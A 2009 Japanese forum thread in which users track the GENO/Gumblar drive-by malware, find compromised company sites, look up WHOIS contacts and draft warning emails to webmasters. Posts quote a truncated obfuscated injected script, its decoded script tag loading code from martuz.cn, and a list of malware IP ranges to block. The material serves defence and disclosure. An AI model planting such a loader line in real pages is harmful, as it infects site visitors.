09/05/17 11:45:48 Sggs+C2i0
>>38
ありがとう助かります。
何せ外部リンクを結構チェックしないといけないので
45:192.168.0.774
09/05/17 11:46:35 dj6spVc50
同人というより鬼の首とったように
質問してる奴は腐腐言ってるやつの方が厄介だった気がする
46:192.168.0.774
09/05/17 11:48:59 T9pTie3x0
静けさが嘘のようだw
47:192.168.0.774
09/05/17 11:50:50 6zykGUMd0
よろしくー
48:192.168.0.774
09/05/17 11:51:08 MP/sWvjo0
ID出るだけでこうも違うとはw
>>44
作者さんに言ってあげて。俺、単なる間違い指摘入れただけの人だから。
49:192.168.0.774
09/05/17 11:51:42 rsI8zkAT0
移動完了
50:192.168.0.774
09/05/17 11:53:03 6zykGUMd0
烏骨鶏は凸電誰かしましたか?
放置しておくと大変なことになる
51:192.168.0.774
09/05/17 11:53:07 ffQj4EqF0
AdobeAcrobatReaderのJavaScriptの脆弱性って、今年の3月にver.9.1で修正されたものと、
5月にver.9.1.1で修正されたものの2種類あるんだが、
いわゆるGENOウイルスってどちらの脆弱性ついたんだろうな。
もちろんどの脆弱性が塞がれているから安心ってのは無いけど、情報として知っておきたい。
52:192.168.0.774
09/05/17 11:56:19 /tk9oSEO0
>>50
電話番号書いてあるのは公式HPぐらい。
缶切りが缶詰の中に入ってる状態とはこの事
53:192.168.0.774
09/05/17 11:57:28 vLbMFr+GP
誰かタウンページ持ってこい
54:192.168.0.774
09/05/17 11:59:04 T9pTie3x0
>>50
流れちゃってわかんないけど、もいっこあった希ガス
55:あっちのスレの42
09/05/17 11:59:23 2KRNOGSH0
>>51
9.1.1で修正された方だと思っていたが・・・。
56:192.168.0.774
09/05/17 11:59:46 6zykGUMd0
ver.9.1ではバッファーオーバーフローの脆弱性あったよね
ver.9.1.1でそれを解決したんじゃない
57:192.168.0.774
09/05/17 12:01:29 Sggs+C2i0 BE:762340739-S★(634668)
これいいかな?
URLリンク(tvsurf.jp)
58:192.168.0.774
09/05/17 12:01:52 ffQj4EqF0
>>55
あっちのスレの42さんか、俺はてっきり9.1修正のほうだと思ってたんで、逆に42さんの書き込みみてどうしたものかと思った口なんだ。
いまのところ、ウイルス対策ベンダにも2chも情報が少ない状態過ぎる。
59:192.168.0.774
09/05/17 12:02:30 2KRNOGSH0
ダメだ。あっちのスレでこっちに誘導してる・・・。
60:192.168.0.774
09/05/17 12:04:01 0Et/Qq5U0
>>59
>>37
61:192.168.0.774
09/05/17 12:04:03 MP/sWvjo0
>>54 コピペだけどこれかな?
hXXp://www.seibidoshuppan.co.jp/
感染確認
62:192.168.0.774
09/05/17 12:05:20 6zykGUMd0
>>61
今日は休みじゃないかな?
63:192.168.0.774
09/05/17 12:06:39 2KRNOGSH0
>>59
いや、俺の思い込みかもしれない。
9.1の脆弱性をついた攻撃が既に広まっていたから、adobeが大急ぎで作ったのが9.1.1だったはず。
GENOのとタイミングが合っていたから 9.1の方ってのは可能性も考えてなかった。
情報は本当に少ないね。
64:192.168.0.774
09/05/17 12:09:32 T9pTie3x0
>>61
うこっけい
URLリンク(www.100bangai.co.jp)
これか?お菓子やさんだったの・・・?
googleからurl検索したらavastさんが怒って焦ったw
65:192.168.0.774
09/05/17 12:21:14 6zykGUMd0
61 名前:192.168.0.774[sage] 投稿日:2009/05/17(日) 12:04:03 ID:MP/sWvjo0
>>54 コピペだけどこれかな?
hXXp://www.seibidoshuppan.co.jp/
感染確認 ここは出版社
烏骨鶏はhxxp://www.ukokkei.co.jp/
フリーダイアルしか載ってないな、受注オペレーターじゃ話にならないし ><
66:192.168.0.774
09/05/17 12:23:41 T9pTie3x0
>>65
>>64に載ってるよ。多分それ。そこは踏んでも平気。
ukokkeiのurlで検索するとトロイ検出するから気をつけてw
店舗のメアドがない
67:192.168.0.774
09/05/17 12:26:11 MP/sWvjo0
>>65
せいびどう出版社って何処だか知らないけど、オペレーターに訳を説明して
TEL転送とか、電話先を教えてくれるんじゃない?
68:192.168.0.774
09/05/17 12:28:00 PUr+H3m+0
「お宅のHPを見たらウィルスの警告が出てくる。
どういうわけか説明してもらいたい。」
って言えば良いんじゃない?
69:192.168.0.774
09/05/17 12:29:48 T9pTie3x0
本名で教えても良いけど、ウイルス食らっちゃうような店に
言っても解るとも思えないし、下手したら自分が変質者扱いだろうな・・・
でも専門店街代表のメールしかないからメールしてもその人たちが踏んじゃいそう
70:192.168.0.774
09/05/17 12:31:42 6zykGUMd0
こことhxxp://www.ukokkei.co.jp/
専門店街は住所が違うよ
71:192.168.0.774
09/05/17 12:32:07 xG23ce6c0
>>5
感染者がcmd.exeを起動してはダメというレスを別板で見たんだが
このテンプレはこれでいいのか?
72:192.168.0.774
09/05/17 12:32:20 2KRNOGSH0
IPAも平日しか働いていないのか・・・。
受付時間:平日10:00~12:00、13:30~17:00
73:192.168.0.774
09/05/17 12:37:07 6zykGUMd0
とりあえずフリーダイアルで電話して
責任者読んで説明してみる
74:192.168.0.774
09/05/17 12:38:07 PUr+H3m+0
>>73
お前が失敗すると後から凸っても全部悪戯扱いだからな。
それなりに頑張れ
75:192.168.0.774
09/05/17 12:39:36 T9pTie3x0
>>73
フリーダイアルは専門店街のやつ?
76:192.168.0.774
09/05/17 12:41:04 6zykGUMd0
>>75
www.ukokkei.co.jp/ ここ
77:192.168.0.774
09/05/17 12:42:49 T9pTie3x0
>>74
プレッシャーかけんなww
so-netの説明がそれなりに説得力あるけど
URLリンク(www.so-net.ne.jp)
電話だとえっちてーてーぴー.って言わないとダメだな
まぁ焦って一軒閉鎖した所で・・・・・・・・・・(´・ω・`)
78:192.168.0.774
09/05/17 12:43:13 6zykGUMd0
【本店】のフリーダイヤル
79:192.168.0.774
09/05/17 12:45:11 2KRNOGSH0
>>71
たしかに感染サイトのお詫び文には
cmd 起動でエクスプローラーが落ちてregeditが起動できなくなるって書いてあったな。
ウィルスを無効化する方法も書いてあったけど、
あっちスレに転載すると、とんでもないことになりそうだからやめといた。
その方法で本当に無効化できるのかも分からんし、regeditで失敗されても困るし。
バックドアやダウンローダーが入り込んでいれば、仮に無効化できてもいつまで効くか分からないしね。
80:192.168.0.774
09/05/17 12:45:45 PUr+H3m+0
電凸用のテンプレも必要になってくるのかな?
>>77へ
・GENOウィルスというコンピュータウィルスがある。
・Adobe Readerと言う文章読むプログラムの脆弱性を利用し感染する。
・感染したPCでホームページを更新すると、その時にパスワード等を盗み出してしまう。
・盗み出したパスワードでホームページを表示は元のまま、ウィルスのコードが書き加えられてしまう。
・現在お宅のホームページは書き換えられている。
・ソネットで詳しく説明されているので、ホームページの更新担当の人にこの情報を伝えて欲しい。
81:192.168.0.774
09/05/17 12:47:00 6zykGUMd0
電話でない罠>本店
82:192.168.0.774
09/05/17 12:49:33 T9pTie3x0
>>80
正攻法ならそれでいいんじゃない?
・ホームページを見た人が感染する
製作が別会社とか相手がアレだとGENO状態になるかもしれないけど
大手がやられて閉鎖してるってのは入れておいた方が良いとおもうw
so-net読んでもわからんかもね
83:192.168.0.774
09/05/17 12:54:36 c9IgsGG/0
出版社のHPはいろんな大手書店が発注やら在庫確認なんかで使用するので
ものすごいことになると予想
普通に店頭のPCで開いて客に見せたりするからね
84:192.168.0.774
09/05/17 12:55:41 +3+vFr3c0
wiki重いぬ
85:192.168.0.774
09/05/17 12:57:28 ytTR6LEA0
烏骨鶏と出版社のWhoisを調べる。
86:192.168.0.774
09/05/17 12:58:45 Um/4qeYR0
成美堂出版が感染しました
87:192.168.0.774
09/05/17 12:59:12 6zykGUMd0
a. [ドメイン名] UKOKKEI.CO.JP
e. [そしきめい] かぶしきがいしゃ うこっけい
f. [組織名] 株式会社烏骨鶏
g. [Organization] ukokkei,co.,Ltd.
k. [組織種別] 株式会社
l. [Organization Type] Company
m. [登録担当者] MU2056JP
n. [技術連絡担当者] DT033JP
p. [ネームサーバ] ns1.webhosting-jp.com
p. [ネームサーバ] ns2.webhosting-jp.com
[状態] Connected (2009/11/30)
[登録年月日] 2004/11/16
[接続年月日] 2004/11/16
[最終更新] 2009/03/02 17:40:12 (JST)
88:192.168.0.774
09/05/17 12:59:17 mJUiMCyk0
>>3の下の報告もここでいいのか?
邪魔になってない?
89:192.168.0.774
09/05/17 13:01:24 ytTR6LEA0
>>87
Whoisの結果のこの下に担当者と連絡先
があったような気がするのだが。
90:192.168.0.774
09/05/17 13:01:40 Sggs+C2i0 BE:508227629-S★(634671)
>>88
向こうのスレを見ていると機能していないんですよね
91:192.168.0.774
09/05/17 13:02:58 6zykGUMd0
>>89
それが無いです
92:192.168.0.774
09/05/17 13:05:32 T9pTie3x0
>>87
あるよ。
担当者名とメールアドレス
ここに晒しちゃまずいかな?
レン鯖はフューチャースピリッツ
93:192.168.0.774
09/05/17 13:05:40 ilxyL7Fy0
>>5
>③avast!(無料のアンチウイルスソフト)で確認
これ違う。感染後の確認には使えない。
avastは、感染を撒き散らしているサイトのスクリプトの大半に反応するので、ブロックできる
可能性が高いというだけ。(感染しているのにすり抜けるページも幾つか確認しているので、
完全には信用できない)
すり抜けて本体が落とされてしまった場合、Avastで検索しても見つからない可能性が高い。
(ほぼ日替わりで本体が入れ代わっており、入れ代わった後のパターン対応はどこの
セキュリティソフトベンダーでも追い付いていない)
予防法としては、Avastで感染サイトを訪問すると反応する(いくらかのすり抜けは発生する)ので
チェック可能。但し、すり抜けた時はがっつり感染するので自己責任。
幾つかのベンダーが行なっている本体の置かれているサイトをFW機能でブロックするのが
一番確実な方法。FW機能のないセキュリティソフトの場合、PG2の併用によってブロックするのが有効。
但し、本体の置かれるアドレスが変更になった場合(先週の金曜日辺りに入れ代わったんだっけ?)
ブロック対象の指定を追加しなければいけない。
スクリプトを検知するAvastの方式も、IP範囲をブロックするカスペ等の方式も、両方完璧ではないが
予防法としては一定の効果が見込めるというだけ。
94:192.168.0.774
09/05/17 13:06:06 ytTR6LEA0
>>91
昔調べたときあったと思ったのだなあ。
Whoisがそれでトラブルがあったとしか記憶がない。
ないならしょうがないか。
ありがとう。
95:192.168.0.774
09/05/17 13:06:43 6zykGUMd0
>>92
あった?Whoisは公開されてるものだからいいでしょ
96:192.168.0.774
09/05/17 13:07:39 ytTR6LEA0
>>92
>担当者名とメールアドレス
>レン鯖はフューチャースピリッツ
そこに警告のメールを送ってみるしかないだろうね。
97:192.168.0.774
09/05/17 13:08:17 IjPG7tgR0
>>80
素人向けには難しい言葉ばかりだな。
・GENOウィルスというコンピュータウィルスがある。
・pdfファイルを読むプログラムに問題があり感染する。
・現在御社のホームページは書き換えられ、GENOウィルスが仕込まれている。
・総務部門かホームページの担当者にこの情報を伝えて欲しい。
これぐらいでいいんじゃね?
98:192.168.0.774
09/05/17 13:08:53 6zykGUMd0
>>92
Whoisクライアント何使ってるんですか?
99:192.168.0.774
09/05/17 13:08:58 mJUiMCyk0
>>90
煽りや質問多いもんな
100:192.168.0.774
09/05/17 13:09:52 2KRNOGSH0
>>88
スレがあんなにヒドイことになると思わずに立ったスレだから、
仕方ないよね。
>>96
名前と電話番号
みっけた。
けど、ここに書いて本当にいいのか俺には分からない。
101:192.168.0.774
09/05/17 13:10:13 T9pTie3x0
>>95
URLリンク(whois.ansi.co.jp)
店舗のメールだね
102:192.168.0.774
09/05/17 13:10:15 um/XFnMU0
>>97
pdfなんて拡張子伝えられても訳ワカメだと思ったんでAdobe Readerって名前入れておいた。
それ以外に関してはそれでも良いかもだけど、その程度の情報だと今度は怪しい勧誘みたいにも聞える
103:192.168.0.774
09/05/17 13:10:30 7TaPV4fL0
>>93
やっぱ現段階ではNoScript必須ですな。
JavaScriptを利用しない形式に変わったらそれすら無効ですが・・・。
104:192.168.0.774
09/05/17 13:11:54 T9pTie3x0
>>97
2番目が難しいと思う
見た人(顧客)が感染するって入れた方がいいんでない
105:192.168.0.774
09/05/17 13:11:57 ilxyL7Fy0
>>42
>・なんらかの方法によるサーバへの侵入
>FTPパスワードの漏洩なのかWebアプリの改ざんなのかは不明です。
・セキュ板のGENOスレの1か2辺りで、ローカルにしか繋いでいないサーバーのhtmlが書き換えられたという報告
(動作中のマルウェアが行なっているのか、外部からのバックドア経由の操作なのかは不明)
・ftpログを見たら、海外からのアクセスで改変が行われていたという報告(ftpパスは漏洩していると考えるべき)
・動作解説してるサイトの翻訳では、感染PCがゾンビ化するというものがあったので、BOTネットに組込まれている
可能性があり、そちらから操作される可能性がある
こんな感じかな。
106:192.168.0.774
09/05/17 13:12:03 I5G8A/p20
>>98
URLリンク(whois.jprs.jp)
でWhois検索すると、登録担当者と技術担当者のIDがリンクで出てくるのでそれをポチっと。
107:192.168.0.774
09/05/17 13:13:30 ytTR6LEA0
>>100
感染したサイトの会社に連絡つかないと
そこしか通報するしかないからねえ。
とりあえず、文章だけども考えておかないと。
108:192.168.0.774
09/05/17 13:13:49 6zykGUMd0
>>106
あり~
109:192.168.0.774
09/05/17 13:16:03 ilxyL7Fy0
○○○○ ご担当者さま
■ お願い
御社のHPに、閲覧者のPCに、第三者のサイトよりマルウェア(コンピュータウイルス)を
ダウンロードさせるスクリプトが挿入されております。
この攻撃プログラムは、Adobe Acrobat Reader、Adobe Flash Playerの脆弱性を利用して
パソコンの中にスパイプログラムを送り込みます。 Windows XP、2000とAcrobat Reader、
Flash Playerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。
同様のスクリプトの仕込まれたHPを閲覧することで感染したPCを利用して、
HPの更新作業を行なったため、(該当PCで稼働中のマルウェアが行なったのか、
FTPのIDとパスを盗みだした外部からのアクセスかはわかりませんが)
現在の状況になっているものと思われます。
これは、先日、小林製薬のHPで発生したものと同じものと思われますので
状況確認の上、感染PCからのウイルス除去と、HPの修正、閲覧者向けの告知を
行なって頂けないでしょうか。
下記のXXXXXにて報告があり、当方でも確認したところ、確かに危険コードが
含まれておりました。HP閲覧者のPCにウイルスが勝手にダウンロードされて
しまうため、御社のHPが意図せぬ加害者となっております。
(感染報告のあったスレッド等のアドレス)
HP更新に使用したPCがマルウェア(通称zlkon・GENOウイルス)に感染していると思われます。
■ 確認した感染ページ
(わかる範囲で記載)
<多分、全てのページが感染中>
●HTMLファイルの場合
<body>タグの直前に難読化されたコードが埋め込まれる。
●PHPの場合
ファイルの最初に難読化されたコードが埋め込まれる。
●JSの場合
ファイルの最後に難読化されたコードが埋め込まれる。
その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。
110:192.168.0.774
09/05/17 13:17:21 T9pTie3x0
>>109
俺が担当なら読まないで捨てるww
so-net貼ってあげたら?
111:192.168.0.774
09/05/17 13:17:22 ilxyL7Fy0
■感染していると思われるページの危険部分
(一応、ページによって内容異なるので、ソースチェッカーなり、
IE以外のブラウザでview-source:~ で確認したものを貼り付ける)
|<script language=javascript><!--
|(function(){var UkRR='%';var WdBp=('v&61r&20a&3d&22S&63<以下省略>
| --></script>
■ 感染していると思われるウイルスの情報
下記のサイトの情報にあるマルウェアによるものと思われます。
これは、Web閲覧で知らぬうちに導入されてしまうものです。
URLリンク(www.so-net.ne.jp)
URLリンク(www.so-net.ne.jp)
URLリンク(www.kobayashi.co.jp)
URLリンク(www29.atwiki.jp)
(↓はちょっと専門的な解説です)
URLリンク(ilion.blog.shinobi.jp)
URLリンク(www.itmedia.co.jp)
このマルウェアに感染したPCで、FTP接続しファイルを更新すると、動作中の
マルウェアが、感染サイトを呼び出すスクリプトを勝手に挿入してしまうため、
現在の状況になっているものと思われます。
PC内のアップロード前のファイルには、現在でも危険なコードは含まれて
いない筈ですので、PC復旧作業に入る前に、なんらかのメディアに
バックアップをとっておくと良いでしょう。
■ 解決方法について
駆除方法
URLリンク(www29.atwiki.jp)
一度感染してしまうと、PC稼動状態で除去するのは困難ですので、必要なデータを
バックアップした後で、PCリカバリもしくはOS再インストールを行なって、
安全な環境にしてください。(IDとかパスワードのメモやブックマークも
忘れずにバックアップを)
OS再インストール(またはPCリカバリ)の後、WindowsUpdateを全て当てて、
セキュリティソフトを導入し、パターンを最新にした上で、各種アプリの
インストールや、バックアップしたデータの書き戻しを行なってください。
安全なPCから、不正なスクリプトを含まないhtmファイルをアップロードすることで
HPは正常な状態に戻ると思われます。
ftpパスワードやID、その他のSNSのパスワードなども、盗みだされている可能性が
ありますので、安全なPCから、自分の使用している(4月以降にログイン動作を
行なった可能性のある)パスワードを全て変更しておいたほうがいいかもしれません。
112:192.168.0.774
09/05/17 13:18:24 ilxyL7Fy0
(以下を付けるかどうかはお好みで)
■再発防止策
WindowsUpdate、Adobe Acrobat Reader、Adobe Flash Playerの積極的なアップデートに
加えて、既知の危険サイト(今回の場合は、URLリンク(www29.atwiki.jp)の焼却リスト参照)を
ブロックするよう、セキュリティソフトのFWを適切に設定したり、PG2といったソフトで
ブロックすることしかないと思います。
感染してしまったことは、新型の危険ファイル配布方法の為、仕方ない面もありますが、
再発防止と、閲覧者に対する告知によって、被害の拡大を食い止めて頂きたいと思います。
■私見による蛇足
小林製薬の告知ページ等では、幾つかのセキュリティソフトベンダーを紹介して
おりますが、実際に稼動する本体は、ほとんど日替わりのように入れ替えられて
いる為に、紹介されているセキュリティソフトにて「除去が行なえるとは言い
切れません」。
URLリンク(www.kobayashi.co.jp)
また、感染ファイルの除去を行なっても、Windowsの一部ファイルを変更して
しまっている為、原状復帰には至りませんので、閲覧者向けに告知される場合は、
セキュリティソフトベンダーのソフトでで駆除できる可能性もありますが
PCのリカバリを推奨するのが良いのではないかと思われます。
以上、要件のみにて失礼致します。
--
○○○○(自分の名前) <自分の連絡先メールアドレス>
113:192.168.0.774
09/05/17 13:19:27 ilxyL7Fy0
>>109,>111-112
昨日、みかけた範囲の感染サイト管理者に送ったメールのコピペ。
テンプレの叩き台にでもどうぞ。
114:192.168.0.774
09/05/17 13:19:43 mJUiMCyk0
>>90
>>100
スレリンク(sec板:907番)
長くなっちったから
ぬっちしたアドレスだけ置いとく ありがとう
115:192.168.0.774
09/05/17 13:19:59 AvccT1I50
ID:ilxyL7Fy0さん乙です
116:192.168.0.774
09/05/17 13:20:16 Sggs+C2i0
>>112
最初に小林製薬が感染したと同じウィルスと入れた方がインパクトがあるように思いますが
117:192.168.0.774
09/05/17 13:21:09 6zykGUMd0
>>109
文才ありますねー、それで送ってください
118:192.168.0.774
09/05/17 13:21:44 GRfaSwDkP
>>116
製薬会社がウィルスに感染したとかとんでもないしな
119:192.168.0.774
09/05/17 13:22:42 T9pTie3x0
>>113
いやー管理者っつっても名前だけで外に製作任せてるかもしれんしな
まずは読ませる事を考えて、実例と顧客に被害が及ぶ事を説明して
信憑性あるサイトでも貼り付けて対応はよくわかる人に任せた方がいいんじゃない
何通もそんなの着ても速攻でゴミ箱いきな予感
120:192.168.0.774
09/05/17 13:24:51 2KRNOGSH0
>>107
最近、いろいろな国内企業の公式サイトが 悪意の攻撃者に改竄されているのはご存知でしょうか?
先日も小林製薬のサイトも改竄されて、サイトを閲覧した一般のお客さんにウィルスが感染しました。
じつは・・・
みたいな切り出しでよいのでは?
対策法とかは、もしかしたら、その担当者がセキュリティーベンダーに相談するような方向の方が良いかもしれない。
尋ねられたら、知っている範囲で答えてあげればいいし。
それだと、イタズラに思われるかな?
121:192.168.0.774
09/05/17 13:25:33 5zpzhS0v0
>>120
なんかスパムメールみたいに見えるなぁ
どうしたもんかね
122:192.168.0.774
09/05/17 13:26:25 7TaPV4fL0
まさか、人に文を読ませるために考えることになるとは思わなかったなw
123:192.168.0.774
09/05/17 13:27:17 T9pTie3x0
アフェリみたいでうさんくさいwwwごめん(´・ω・`)
ちょっとスレから離れます。適当にがんがれw
俺は>>120路線でso-net張ってやって、
誰かに相談してねって方向が良いと思う
url貼っちゃうと感染してないPCで踏んじゃうかもね
124:192.168.0.774
09/05/17 13:27:52 ytTR6LEA0
新たな「Webウイルス」が猛威、感染被害が急増:ITpro
URLリンク(itpro.nikkeibp.co.jp)
正規サイトに感染広がる:新手のWebベースマルウェアが急拡大 - ITmedia エンタープライズ
URLリンク(www.itmedia.co.jp)
セキュリティ通信|セキュリティ関連ニュース バックナンバー
正規サイト改ざん(2) 薬事日報社が調査結果公表?改ざんの手口が明らかに
URLリンク(www.so-net.ne.jp)
セキュリティ通信|セキュリティ関連ニュース バックナンバー
正規サイト改ざん(3) ウイルスに感染しないための対策
URLリンク(www.so-net.ne.jp)
もし、メールを送るのなら、これもつけておくと吉かも。
125:192.168.0.774
09/05/17 13:27:59 rsI8zkAT0
>>121
スパム吹いた
もうそんな風にしかみえなくなったじゃないかw
126:192.168.0.774
09/05/17 13:29:09 77O8s7yk0
今までの流れをみてると、各自が自分でちゃんと対策するのに任せるしかないって気がするけどな。
127:192.168.0.774
09/05/17 13:29:42 0CtfCDPI0
>>111
unescape()して出てくるサイトの一覧ってどこにあるの?まとめサイト?
成美堂出版の改竄部分をunescape()したら martuz.cn が出たけど
<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>
src=// なんて表記でちゃんとアクセスできるのかな? http: の部分を抜くのは何なんだ??
128:192.168.0.774
09/05/17 13:31:22 fQ7GRX9bO
>>121
典型的なスパム文だわな
初めに誰もが知ってる大手の名前を出して注意をひくところが
難しいねぇ
129:192.168.0.774
09/05/17 13:32:13 T9pTie3x0
御社のHPを拝見した所、ウイルスを検出しました。
HPが改変されています。
これは、現在流行っているウイルスの一種で、
HPを見るだけで感染してしまい、被害を拡大する恐れがあります。
こちらのso-netのリンクに詳細が書かれているので参考にしてください。
so-netのURL
ご対応の程、宜しくお願い申し上げます。
尚、ウイルスに関して現在判明している情報は以下の通りです。
まとめのURLか、セキュベンダーのURL
↑こんなんでどうでしょ
130:192.168.0.774
09/05/17 13:34:14 Sggs+C2i0
正規のプロバイダメールで出せばどうなのかな?
ヘッダを見たらスパムメールじゃない事が分かるし
131:192.168.0.774
09/05/17 13:35:58 77O8s7yk0
名前だしただけで信頼されるような大手が複数でこの問題を扱ってるのを示せるわけじゃないからなあ。
現状で個人ができることなんてたかが知れてるし、変なやる気出してマルチポストしまくるのはかえって問題だ。
ちゃんと説明できるやつが家族や友人の面倒みるくらいで十分じゃないか。
企業の面倒まで見切れない。
132:192.168.0.774
09/05/17 13:36:03 CRVJI+EQ0
一般人っぽく簡潔に書くのがいいんだろうな。やっぱり
133:192.168.0.774
09/05/17 13:36:15 T9pTie3x0
店舗のメアドに送るならヘッダすら見ないと思うし
製作した会社とか鯖缶宛てなら詳しい事書かないでも
まとめ見りゃわかるでしょ。一般的に見たら解らないものは拒否だから。
134:192.168.0.774
09/05/17 13:36:20 ilxyL7Fy0
わたしの主人がオオアリクイに~(以下略) みたいなタイトルで送るとか。(余計にスパムだなw)
ま、冗談はさておき
1.HP管理者は気付いてすらいないのが殆どなので、読んでもらう必要がある
2.放置すると、ウイルス感染の二次被害の加害者になる危険があることを説明
3.よくわからないコードであるところの危険部分がどこだか指摘
(どの箇所に挿入されるか書いておくだけでいいかも?)
4.対処方法の説明。
まずはPCリカバリかOS再インストール→ftpパスワードを変更する→Webサーバーの中身を空にする
→感染していないファイルを再UP の順番で行なうように説明
5.参考情報として、該当ウイルスの情報や対策についてのまとめリンクをつけておく
(これを前に持ってくるか後に持ってくるかはどっちがいいんだろう?)
6.おまけとして念のために予防策の説明(は、押し付けがましいのでなくてもいいかも)
135:192.168.0.774
09/05/17 13:36:50 uL9xj+2n0
>>129
非常勤の親父「また迷惑メールか削除削除・・・」
136:192.168.0.774
09/05/17 13:36:57 K2sBx0VP0
上で誰かが書いてたか、お客さんを装った平易な文章のほうがいい気がする
「お宅のホームページ見てたらアンチウイルスソフトが警告を出したので、調べてみたら
ウイルスコードがしかけられているようでした。
(so-netURL)と同じものと思われます。
ホームページを見るだけで、お客のパソコンが感染する危険なウイルスです。
どうか今すぐ対策をとってください
(対策サイトURL)」
とかなんとか
137:192.168.0.774
09/05/17 13:37:27 Um/4qeYR0
【速報】虹裏感染の疑い
138:192.168.0.774
09/05/17 13:37:57 T9pTie3x0
>>135
あるなwww
ここまで簡単に書いてもそれなら
もうそれはしょうがないよ
GENOの担当者は結局無反応だったよね?
139:192.168.0.774
09/05/17 13:38:09 mJUiMCyk0
複数名から違う文章で送れば 対応してくれんかなあ
140:192.168.0.774
09/05/17 13:39:11 ilxyL7Fy0
7.閲覧者への事後報告と、感染の可能性の疑われる場合は、使用中のセキュリティソフトベンダーに
相談するように告知して欲しい、隠蔽されてしまうと、被害が拡大し、最終的にはその企業の信用が
落ちてしまう。…ということも伝えたいがどうしたもんか。
141:192.168.0.774
09/05/17 13:39:34 77O8s7yk0
メールちゃんと読んでくれるような管理者ならすでに問題を知っていて対策してるだろ。
2chのまとめだってどこまで信頼してもらえるか微妙だし、こちらの所属を明らかにして送るんでもなければスパム扱いで終わりだ。
142:192.168.0.774
09/05/17 13:39:58 T9pTie3x0
>>139
なんだ急に変なメール増えたな・・・削除削除(´・ω・)
レン鯖に連絡した方がいいんじゃね?
まぁ一軒潰した所で(ry
143:192.168.0.774
09/05/17 13:41:26 ilxyL7Fy0
HP管理者ではなく、そのIPを管理している業者(whoisで調べる)のabuse窓口に送って、
ISPもしくは、レンタルサーバー管理会社を経由して警告して貰うという手法もあるね。
144:192.168.0.774
09/05/17 13:43:33 um/XFnMU0
もうこれぐらい挑発的なので良いんじゃないか?
これ送って反応無ければ、たまたま見つけた人っぽく上のメール送ってやる感じで
貴社のホームページがGENOウィルスに感染し、現在加害者になっています。
数日中に貴社ホームページよりウィルスコードの除去がなされていない場合、
京都府警察ハイテク犯罪対策室へ連絡させていただきます。
p.s. 対策に関してはググレ
管理できないホームページなら閉鎖しろ糞管理人
145:192.168.0.774
09/05/17 13:44:37 T9pTie3x0
てめーこのやろー
ページ開いたらパソコンばっ壊れたじゃねーか
さっさとHP直しやがれ誠意ってなんですかねぃおおぅ?!
146:192.168.0.774
09/05/17 13:48:45 mJUiMCyk0
replica08■web■fc2■com/index■html
感染
147:192.168.0.774
09/05/17 13:49:06 +iVGXmeP0
・Adobe Flash Playerを更新
バージョンの確認 最新:10.0.22.87
URLリンク(www.adobe.com)
ダウンロード
URLリンク(get.adobe.com)
・(入れてる人は)Adobe Readerを9.1.1に更新し、Javascriptの実行を制限する
ダウンロード 9.1
URLリンク(get.adobe.com)
ダウンロード後、[ヘルプ]→[アップデートの有無をチェック]することで9.1.1にし、
[編集]→[環境設定]→<JavaScript>→<Acrobat JavaScriptを使用>のチェックを外し、[OK]
(´・ω・`)らんらん♪
148:192.168.0.774
09/05/17 13:49:47 T9pTie3x0
感染ってどうやって見つけてるの?
149:192.168.0.774
09/05/17 13:51:26 yMbOeyMJ0
>>147
(´・ω・`)らん豚帰れよ
150:192.168.0.774
09/05/17 13:54:23 RrqXiVyA0
avastとバスター2009の同居ってやっぱだめ?
151:192.168.0.774
09/05/17 13:55:57 iagHZf1s0
すまん、流れ読まずに投下
gnome氏のzlkon/gumblarサイトを参考に作ったんで防止策の一つとして貼っておく
・サーバがちょくちょく変わる性質なので今後の動向に注意
・一番上のmartuz.cnはNEW
・行頭の"HiPr-"はgnome氏が緊急(High Priority)と書いてるもの
・言うまでもないが、IP範囲最終決定とか使用は自己責任で
HiPr-NEW martuz.cn - 2009.05.16 (95.129.144.0/23) :95.129.144.0-95.129.145.255
HiPr- Botnet C&C by Gumblar - 2009.05.09 (78.109.16.0/20) :78.109.16.0-78.109.31.255
HiPr- gumblar relative 2009.05.07 (213.182.192.0/19) :213.182.192.0-213.182.223.255
HiPr- gumblar - 2009.05.02 (94.229.64.0/20) :94.229.64.0-94.229.79.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (206.44.0.0/16) :206.44.0.0-206.44.255.255
Malware Injection 2009.05.06 (91.211.64.0/23) :91.211.64.0-91.211.65.255
basesrv3.net - 2009.05.03 (91.212.41.0/24) :91.212.41.0-91.212.41.255
Malware Injection 2009.05.06 (91.212.65.0/24) :91.212.65.0-91.212.65.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (85.17.0.0/16) :85.17.0.0-85.17.255.255
autobestwestern.cn - 2009.05.13 (85.214.90.0/24) :85.214.90.0-85.214.90.255
gumblar via e-mail - 2009.05.12 (74.220.215.0/24) :74.220.215.0-74.220.215.255
zlkon another-type 2009.05.03 (212.117.160.0/19) :212.117.160.0-212.117.191.255
zlkon.lv -- 2009.04.05 (94.247.2.0/23) :94.247.2.0-94.247.3.255
152:192.168.0.774
09/05/17 13:57:46 77O8s7yk0
一般に、機能の衝突するセキュリティソフトを複数導入するのは推奨されない。
153:192.168.0.774
09/05/17 13:58:36 RrqXiVyA0
>>152
だよね
バスター常時待機でときたまavastで検索って感じがいいかな?
154:192.168.0.774
09/05/17 14:00:18 0CtfCDPI0
成美堂出版 → martuz.cn
<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>
replica08■web■fc2■com → martuz.cn
<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>
意外と飛び先は少ないのかもしれん リストが無いならつくるかねぇ
155:192.168.0.774
09/05/17 14:00:38 2KRNOGSH0
俺スパマーになれんのか?あっはは。
>>146のIP 208.71.106.38
>>147
Adobe Readerってバージョン違いで共存できたっけ?
テンプレ的には Ver1~Ver8とか使っている人は削除して ってのを途中に入れたほうがいいかもしれない。
しかし、IPA↓ 110番を語るには休みすぎ。
コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設けております。
届出の方法等、コンピュータウイルスに関連のあることは何でもご相談下さい。
受付時間:平日10:00~12:00、13:30~17:00
>>151
参考にさせてもらいます。
156:192.168.0.774
09/05/17 14:04:21 1tk6kEt+0
>>93
Avast!をすり抜けるサイト教えてくださいませ。見つけられない。
157:192.168.0.774
09/05/17 14:05:24 LQE1Ao+t0
「5.危険IPのブロック」の方法がわからないのですが、教えてくれませんか?
158:192.168.0.774
09/05/17 14:08:44 1tk6kEt+0
>>157
